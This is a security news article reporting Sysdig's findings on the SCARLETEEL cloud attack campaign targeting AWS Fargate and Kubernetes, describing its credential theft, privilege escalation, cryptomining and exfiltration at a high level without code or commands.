Cloud environments continue to be at the receiving end of an ongoing advanced attack campaign dubbed SCARLETEEL, with the threat actors now setting their sights on Amazon Web Services (AWS) Fargate.
“Cloud environments are still their primary target, but the tools and techniques used have adapted to bypass new security measures, along with a more resilient and stealthy command and control architecture,” Sysdig security researcher Alessandro Brucato said in a new report shared with The Hacker News.
SCARLETEEL was first exposed by the cybersecurity company in February 2023, detailing a sophisticated attack chain that culminated in the theft of proprietary data from AWS infrastructure and the deployment of cryptocurrency miners to profit off the compromised systems’ resources illegally.
A follow-up analysis by Cado Security uncovered potential links to a prolific cryptojacking group known as TeamTNT, although Sysdig told The Hacker News that it “could be someone copying their methodology and attack patterns.”
The latest activity continues the threat actor’s penchant for going after AWS accounts by exploiting vulnerable public-facing web applications with an ultimate aim to gain persistence, steal intellectual property, and generate revenue using crypto miners, potentially racking up cloud bills to the tune of $4,000 per day.
“The actor discovered and exploited a mistake in an AWS policy which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to then do with it what they wanted,” Brucato explained.
It all begins with the adversary exploiting JupyterLab Notebook containers deployed in a Kubernetes cluster, leveraging the initial foothold to conduct reconnaissance of the target network and gather AWS credentials to obtain deeper access into the victim’s environment.
This is followed by the installation of the AWS command line tool and an exploitation framework called Pacu for subsequent exploitation. The attack also stands out for its use of various shell scripts to retrieve AWS credentials, some of which target AWS Fargate compute engine instances.
“The attacker was observed using the AWS client to connect to Russian systems which are compatible with the S3 protocol,” Brucato said, adding the SCARLETEEL actors used stealthy techniques to ensure that data exfiltration events are not captured in CloudTrail logs.
Shield Against Insider Threats: Master SaaS Security Posture Management
Worried about insider threats? We’ve got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.
Some of the other steps taken by the attacker include the use of a Kubernetes Penetration Testing tool known as Peirates to exploit the container orchestration system and a DDoS botnet malware called Pandora, indicating further attempts on part of the actor to monetize the infected hosts.
“The SCARLETEEL actors continue to operate against targets in the cloud, including AWS and Kubernetes,” Brucato said. “Their preferred method of entry is exploitation of open compute services and vulnerable applications. There is a continued focus on monetary gain via crypto mining, but […] intellectual property is still a priority.”